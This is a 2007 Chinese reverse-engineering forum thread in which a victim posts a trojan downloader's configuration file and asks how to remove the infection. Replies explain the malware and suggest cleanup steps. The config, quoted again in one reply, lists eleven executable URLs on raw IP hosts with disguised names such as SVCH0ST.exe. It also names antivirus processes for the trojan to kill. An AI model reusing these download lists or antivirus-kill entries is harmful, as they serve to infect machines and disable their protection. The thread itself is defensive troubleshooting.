首页
社区
课程
招聘
那位牛人可以告诉以下如何去除这个病毒?弄了一下午
发表于: 2007-4-1 18:34 6770

那位牛人可以告诉以下如何去除这个病毒?弄了一下午

2007-4-1 18:34
6770
[DOWNLOADNUMS]

updatetm=10
downfile=11
killproc=5

[STARTHTMPAGE]

;mainpage=http://www.sina.com.cn

[DOWNMAINLIST]

mainfile=http://61.152.169.194/007/007.exe

[DOWNFILELIST]

downfile1=http://61.152.169.194/007/ldasd.exe
downfile2=http://61.152.169.194/007/SVCH0ST.exe
downfile3=http://61.152.169.194/007/IEXPL0R.exe
downfile4=http://61.152.169.194/007/SC0NFIG.exe
downfile5=http://61.152.169.194/007/TIMPLATF0RM.exe
downfile6=http://61.152.169.194/007/SPy.exe
downfile7=http://61.152.169.194/007/IECONFIG.exe
downfile8=http://60.169.1.29/007/IECOFIG.EXE
downfile9=http://60.169.1.29/007/MCONFIG.EXE
downfile10=http://218.93.127.230/007/SPSJ.EXE
downfile11=http://218.93.127.230/007/wanmeishijie.EXE

[DOWNKILLLIST]

killproc1=kav.exe
killproc2=rav.exe
killproc3=avp.exe
killproc4=kavsvc.exe
killproc5=ravmon.exe

[REMOVREGLIST]

;

这是配置文件...在临时文件夹里
每个文件都加壳了,具体什么壳不清楚
最新杀毒软件无法查杀....
估计是一个新变种病毒...
让我中上了...

[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

收藏
免费 0
支持
分享
最新回复 (11)
雪    币: 2054
活跃值: (292)
能力值: ( LV9,RANK:220 )
在线值:
发帖
回帖
粉丝
2
那位牛人可以告诉以下如何去除这个病毒?弄了一下午...
2007-4-1 18:35
0
雪    币: 208
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
好象是个定时下载者执行后下载11个不同的病毒(估计大部分是游戏木马)
downfile1=http://61.152.169.194/007/ldasd.exe
downfile2=http://61.152.169.194/007/SVCH0ST.exe
downfile3=http://61.152.169.194/007/IEXPL0R.exe
downfile4=http://61.152.169.194/007/SC0NFIG.exe
downfile5=http://61.152.169.194/007/TIMPLATF0RM.exe
downfile6=http://61.152.169.194/007/SPy.exe
downfile7=http://61.152.169.194/007/IECONFIG.exe
downfile8=http://60.169.1.29/007/IECOFIG.EXE
downfile9=http://60.169.1.29/007/MCONFIG.EXE
downfile10=http://218.93.127.230/007/SPSJ.EXE
downfile11=http://218.93.127.230/007/wanmeishijie.EXE
同时杀掉下面5种杀软的进程
killproc1=kav.exe
killproc2=rav.exe
killproc3=avp.exe
killproc4=kavsvc.exe
killproc5=ravmon.exe 。。。。。。卡吧可以杀掉。。我下了那个mainfile文件杀了下。
2007-4-1 18:57
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
楼上的卡巴被杀掉了?
2007-4-1 19:56
0
雪    币: 339
活跃值: (1510)
能力值: ( LV13,RANK:970 )
在线值:
发帖
回帖
粉丝
5
首先考虑弄个比较诡异少见的防火墙把上面那几个IP给屏蔽以下,不过看来你要重新装系统了,现在的木马作者都很无良,一旦沾到你电脑上,就狂给你装东西,根本不考虑和电脑“和谐共存”
2007-4-1 22:37
0
雪    币: 208
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
我说的是。卡吧可以杀掉这个病毒。要不然他也不会想kill  avp进程了。说明他还不是完美的免杀。
2007-4-2 09:30
0
雪    币: 130
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
学习ing.........
2007-4-2 11:23
0
雪    币: 417
活跃值: (475)
能力值: ( LV9,RANK:1250 )
在线值:
发帖
回帖
粉丝
8
即使有空一个个去分析那些病毒,人也会变得很烦躁。
格式化最彻底。
不过可以下一个病毒到jotti去查查,如果哪个杀毒软件查出来了,那么就去下载那个杀软试试。
2007-4-2 12:28
0
雪    币: 8233
活跃值: (2736)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
9
用Win PE启动,找出相应文件(可能还得用ida分析一下),删除即可。有erd更好用,一般的木马更改的启动位置就几个地方,找到删除即可,有问题的话,修复性安装即可解决问题。
2007-4-2 12:39
0
雪    币: 217
活跃值: (40)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
10
这年头,不备ERD是没法活的了,只要进来一个,那什么驱动,隐藏进程,杀防护软件 的一股脑的往机子上装,还不是一个两个,都好几个驱动保护着
2007-4-2 21:16
0
雪    币: 207
活跃值: (20)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
11
这种病毒/,没有遇到过。。以后我要注意了
2007-4-3 18:12
0
雪    币: 2054
活跃值: (292)
能力值: ( LV9,RANK:220 )
在线值:
发帖
回帖
粉丝
12
已经搞定了.谢谢大家的回复
2007-4-3 20:59
0
游客
登录 | 注册 方可回帖
返回
//